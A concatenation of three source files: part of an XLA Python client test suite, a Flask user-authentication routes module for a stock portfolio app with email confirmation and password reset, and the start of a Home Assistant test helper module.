self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
def testReduceWindowVariadic(self):
c = self._NewComputation("reducer")
shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
shape = shape.with_major_to_minor_layout_if_absent()
ps = [ops.Parameter(c, i, shape) for i in range(4)]
which = ops.Ge(ps[0], ps[2])
ops.Tuple(
c, [ops.Select(which, ps[0], ps[2]),
ops.Select(which, ps[1], ps[3])])
reducer = c.build()
key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operands=[ops.Constant(c, key_array),
ops.Constant(c, val_array)],
init_values=[
ops.Constant(c, np.int32(0)),
ops.Constant(c, np.int32(0))
],
computation=reducer,
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = sharding.type.REPLICATED
sharding.tile_assignment_dimensions.extend([1])
sharding.tile_assignment_devices.extend([0])
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}".format(FormatShapeAndDtype(shape, dtype),
take_ownership),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership):
if dtype == np.bool_:
x = np.random.randint(0, 2, size=shape).astype(np.bool_)
else:
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
np.testing.assert_array_equal(
x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
class ClientTest(parameterized.TestCase):
def setUp(self):
super(ClientTest, self).setUp()
self.backend = xla_backend()
def testPlatformVersion(self):
version = self.backend.platform_version
if self.backend.platform == "cpu":
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "gpu":
# Following is false if not built with --config=cuda
if test_util.is_gpu_available(cuda_only=True):
self.assertTrue(
re.match(r"^cuda \d{4,}$", version),
msg=f"Expected CUDA version string; got {repr(version)}")
else:
self.assertEqual(version, "<unknown>")
tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
"""Tests related to DynamicReshape."""
def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
test_fn):
compiled = self.backend.compile(builder.build())
output_buffers = compiled.execute([
self.backend.buffer_from_pyval(
arg, device=compiled.local_devices()[0]) for arg in args
])
self.assertLen(output_buffers, len(expected_results))
for buf, expected in zip(output_buffers, expected_results):
to_py_result = buf.to_py()
self.assertEqual(expected.shape, to_py_result.shape)
test_fn(expected, to_py_result)
if self.backend.platform == "cpu" and buf.dtype != bfloat16:
mview = memoryview(buf)
self.assertEqual(expected.shape, mview.shape)
test_fn(expected, np.asarray(mview))
else:
# Buffer protocol expected to fail on non-cpu platforms and bfloat16
# Note that np.asarray(buf) doesn't throw an exception. To test if the
# error was thrown properly we must use memoryview(buf).
with self.assertRaises(BufferError):
memoryview(buf)
# 1D reshape of full size, half size, and size of 0.
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.parameters((5), (3), (0))
def testReshape1D(self, reshape_size):
full_size = 5
c = self._NewComputation()
arg = np.array(reshape_size, dtype=np.int32)
expected = np.array(range(reshape_size), dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
ops.DynamicReshape(
ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
[True])
self._CompareToPyAndBufferProtocol(c, [arg], [expected],
np.testing.assert_equal)
# 2D reshape with an slice on the minor dimension. We test different types
# where the strides may differ between the host and devices. The reshaped
# physical memory layout is not consecutive, and we test if the program can
# return the correct logical view of the data.
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testReshape2D(self, dtype):
arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
arg1 = np.array(2, dtype=np.int32)
expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
c = self._NewComputation()
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
self._CompareToPyAndBufferProtocol(c, [arg0, arg1], [expected],
np.testing.assert_equal)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testDynamicShapeArgs(self, dtype):
full_size = 10
dynamic_shape_size = 4
# subcomputation 1
binary_add_builder = self._NewComputation()
scalar_shape = xla_client.Shape.scalar_shape(np.dtype(dtype))
ops.Add(
ops.Parameter(binary_add_builder, 0, scalar_shape),
ops.Parameter(binary_add_builder, 1, scalar_shape))
# subcomputation 2
reshape_reduce_builder = self._NewComputation()
dshape = xla_client.Shape.array_shape(
np.dtype(dtype), dims=[full_size], dynamic_dimensions=[True])
reshape_reduce_p = ops.Parameter(reshape_reduce_builder, 0, dshape)
ops.Reduce(
reshape_reduce_builder,
operands=[reshape_reduce_p],
init_values=[ops.Constant(reshape_reduce_builder, dtype(0))],
computation=binary_add_builder.build(),
dimensions_to_reduce=[0])
# main computation: sum(range(full_size)[:dynamic_shape_size])
c = self._NewComputation()
arg = np.array(dynamic_shape_size, dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
reshaped = ops.DynamicReshape(
ops.Constant(c, np.array(range(full_size), dtype=dtype)), [p],
[full_size], [True])
ops.Call(c, reshape_reduce_builder.build(), operands=(reshaped,))
self._ExecuteAndCompareClose(c, [arg], [dtype(6)])
tests.append(DynamicReshapeTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target backend.")
InstantiateTests(globals(),
lambda: xla_client.get_local_backend(FLAGS.backend))
absltest.main()
|
routes.py | from . import users_blueprint
from flask import render_template, flash, abort, request, current_app, redirect, url_for
from .forms import RegistrationForm, LoginForm, EmailForm, PasswordForm, ChangePasswordForm
from project.models import User
from project import database, mail
from sqlalchemy.exc import IntegrityError
from flask import escape
from flask_login import login_user, current_user, login_required, logout_user
from urllib.parse import urlparse
from flask_mail import Message
from flask import copy_current_request_context
from threading import Thread
from itsdangerous import URLSafeTimedSerializer
from itsdangerous.exc import BadSignature
from datetime import datetime
################
#### routes ####
################
@users_blueprint.route('/about')
def about():
flash('Thanks for learning about this site!', 'info')
return render_template('users/about.html', company_name='saidulislam.com')
@users_blueprint.route('/admin')
def admin():
abort(403)
@users_blueprint.errorhandler(403)
def page_forbidden(e):
return render_template('users/403.html'), 403
@users_blueprint.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if request.method == 'POST':
if form.validate_on_submit():
try:
new_user = User(form.email.data, form.password.data)
database.session.add(new_user)
database.session.commit()
flash(f'Thanks for registering, {new_user.email}! Please check your email to confirm your email address.', 'success')
current_app.logger.info(f'Registered new user: {form.email.data}!')
@copy_current_request_context
def send_email(message):
with current_app.app_context():
mail.send(message)
# Send an email confirming the new registration - Updated!
msg = generate_confirmation_email(form.email.data)
email_thread = Thread(target=send_email, args=[msg])
email_thread.start()
return redirect(url_for('users.login'))
except IntegrityError:
database.session.rollback()
flash(f'ERROR! Email ({form.email.data}) already exists.', 'error')
else:
flash(f"Error in form data!")
return render_template('users/register.html', form=form)
@users_blueprint.route('/login', methods=['GET', 'POST'])
def login():
# If the user is already logged in, don't allow them to try to log in again
if current_user.is_authenticated:
flash('Already logged in!')
current_app.logger.info(f'Duplicate login attempt by user: {current_user.email}')
return redirect(url_for('stocks.index'))
form = LoginForm()
if request.method == 'POST':
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user and user.is_password_correct(form.password.data):
# User's credentials have been validated, so log them in
login_user(user, remember=form.remember_me.data)
flash(f'Thanks for logging in, {current_user.email}!')
current_app.logger.info(f'Logged in user: {current_user.email}')
# If the next URL is not specified, redirect to the user profile - NEW!!
if not request.args.get('next'):
return redirect(url_for('users.user_profile'))
# Process the query to determine if the user should be redirected after logging in - NEW!!
next_url = request.args.get('next')
if urlparse(next_url).scheme != '' or urlparse(next_url).netloc != '':
current_app.logger.info(f'Invalid next path in login request: {next_url}')
logout_user()
return abort(400)
current_app.logger.info(f'Redirecting after valid login to: {next_url}')
return redirect(next_url)
flash('ERROR! Incorrect login credentials.')
return render_template('users/login.html', form=form)
@users_blueprint.route('/logout')
@login_required
def logout():
current_app.logger.info(f'Logged out user: {current_user.email}')
logout_user()
flash('Goodbye!')
return redirect(url_for('stocks.index'))
@users_blueprint.route('/profile')
@login_required
def user_profile():
return render_template('users/profile.html')
def generate_confirmation_email(user_email):
confirm_serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
confirm_url = url_for('users.confirm_email',
token=confirm_serializer.dumps(user_email, salt='email-confirmation-salt'),
_external=True)
return Message(subject='Flask Stock Portfolio App - Confirm Your Email Address',
html=render_template('users/email_confirmation.html', confirm_url=confirm_url),
recipients=[user_email])
@users_blueprint.route('/confirm/<token>')
def confirm_email(token):
try:
confirm_serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
email = confirm_serializer.loads(token, salt='email-confirmation-salt', max_age=3600)
except BadSignature as e:
flash(f'The confirmation link is invalid or has expired.', 'error')
current_app.logger.info(f'Invalid or expired confirmation link received from IP address: {request.remote_addr}')
return redirect(url_for('users.login'))
user = User.query.filter_by(email=email).first()
if user.email_confirmed:
flash('Account already confirmed. Please login.', 'info')
current_app.logger.info(f'Confirmation link received for a confirmed user: {user.email}')
else:
user.email_confirmed = True
user.email_confirmed_on = datetime.now()
database.session.add(user)
database.session.commit()
flash('Thank you for confirming your email address!', 'success')
current_app.logger.info(f'Email address confirmed for: {user.email}')
return redirect(url_for('stocks.index'))
@users_blueprint.route('/password_reset_via_email', methods=['GET', 'POST'])
def password_reset_via_email():
form = EmailForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is None:
flash('Error! Invalid email address!', 'error')
return render_template('users/password_reset_via_email.html', form=form)
if user.email_confirmed:
@copy_current_request_context
def send_email(email_message):
with current_app.app_context():
mail.send(email_message)
# Send an email confirming the new registration
message = generate_password_reset_email(form.email.data)
email_thread = Thread(target=send_email, args=[message])
email_thread.start()
flash('Please check your email for a password reset link.', 'success')
else:
flash('Your email address must be confirmed before attempting a password reset.', 'error')
return redirect(url_for('users.login'))
return render_template('users/password_reset_via_email.html', form=form)
def generate_password_reset_email(user_email):
password_reset_serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
password_reset_url = url_for('users.process_password_reset_token',
token=password_reset_serializer.dumps(user_email, salt='password-reset-salt'),
_external=True)
return Message(subject='Flask Stock Portfolio App - Password Reset Requested',
html=render_template('users/email_password_reset.html', password_reset_url=password_reset_url),
recipients=[user_email])
@users_blueprint.route('/password_reset_via_token/<token>', methods=['GET', 'POST'])
def process_password_reset_token(token):
try:
password_reset_serializer = URLSafeTimedSerializer(current_app.config['SECRET_KEY'])
email = password_reset_serializer.loads(token, salt='password-reset-salt', max_age=3600)
except BadSignature as e:
flash('The password reset link is invalid or has expired.', 'error')
return redirect(url_for('users.login'))
form = PasswordForm()
if form.validate_on_submit():
user = User.query.filter_by(email=email).first()
if user is None:
flash('Invalid email address!', 'error')
return redirect(url_for('users.login'))
user.set_password(form.password.data)
database.session.add(user)
database.session.commit()
flash('Your password has been updated!', 'success')
return redirect(url_for('users.login'))
return render_template('users/reset_password_with_token.html', form=form)
@users_blueprint.route('/resend_email_confirmation')
def resend_email_confirmation():
return '<h1>Page Is Under Construction</h1>'
@users_blueprint.route('/change_password', methods=['GET', 'POST'])
@login_required
def change_password():
form = ChangePasswordForm()
if form.validate_on_submit():
if current_user.is_password_correct(form.current_password.data):
current_user.set_password(form.new_password.data)
database.session.add(current_user)
database.session.commit()
flash('Password has been updated!', 'success')
current_app.logger.info(f'Password updated for user: {current_user.email}')
return redirect(url_for('users.user_profile'))
else:
flash('ERROR! Incorrect user credentials!')
current_app.logger.info(f'Incorrect password change for user: {current_user.email}')
return render_template('users/change_password.html', form=form)
|
common.py | """Test the helper method for writing tests."""
from __future__ import annotations
import asyncio
import collections
from collections import OrderedDict
from contextlib import contextmanager
from datetime import timedelta
import functools as ft
from io import StringIO
import json
import logging
import os
import pathlib
import threading
import time
from time import monotonic
import types
from typing import Any, Awaitable, Collection
from unittest.mock import AsyncMock, Mock, patch
from aiohttp.test_utils import unused_port as get_test_instance_port # noqa: F401
from homeassistant import auth, config_entries, core as ha, loader
from homeassistant.auth import (
auth_store,
models as auth_models,
permissions as auth_permissions,
providers as auth_providers,
)
from homeassistant.auth.permissions import system_policies
from homeassistant.components import recorder
from homeassistant.components.device_automation import ( # noqa: F401
_async_get_device_automation_capabilities as async_get_device_automation_capabilities,
_async_get_device_automations as async_get_device_automations,
)
from homeassistant.components.mqtt.models import Message
from homeassistant.config import async_process_component_config
from homeassistant.const import (
DEVICE_DEFAULT_NAME,
EVENT_HOMEASSISTANT_CLOSE,
EVENT_STATE_CHANGED,
EVENT_TIME_CHANGED,
STATE_OFF,
STATE_ON,
)
from homeassistant.core import BLOCK_LOG_TIMEOUT, State
from homeassistant.helpers import (
area_registry,
device_registry,
entity,
entity_platform,
entity_registry,
intent,
restore_state,
storage,
)
from homeassistant.helpers.json import JSONEncoder
from homeassistant.setup import async_setup_component, setup_component
from homeassistant.util.async_ import run_callback_threadsafe
import homeassistant.util.dt as date_util
from homeassistant.util.unit_system import METRIC_SYSTEM
import homeassistant.util.uuid as uuid_util
import homeassistant.util.yaml.loader as yaml_loader
_LOGGER = logging.getLogger(__name__)
INSTANCES = []
CLIENT_ID = "https://example.com/app"
CLIENT_REDIRECT_URI = "https://example.com/app/callback"
def threadsafe_callback_factory(func):
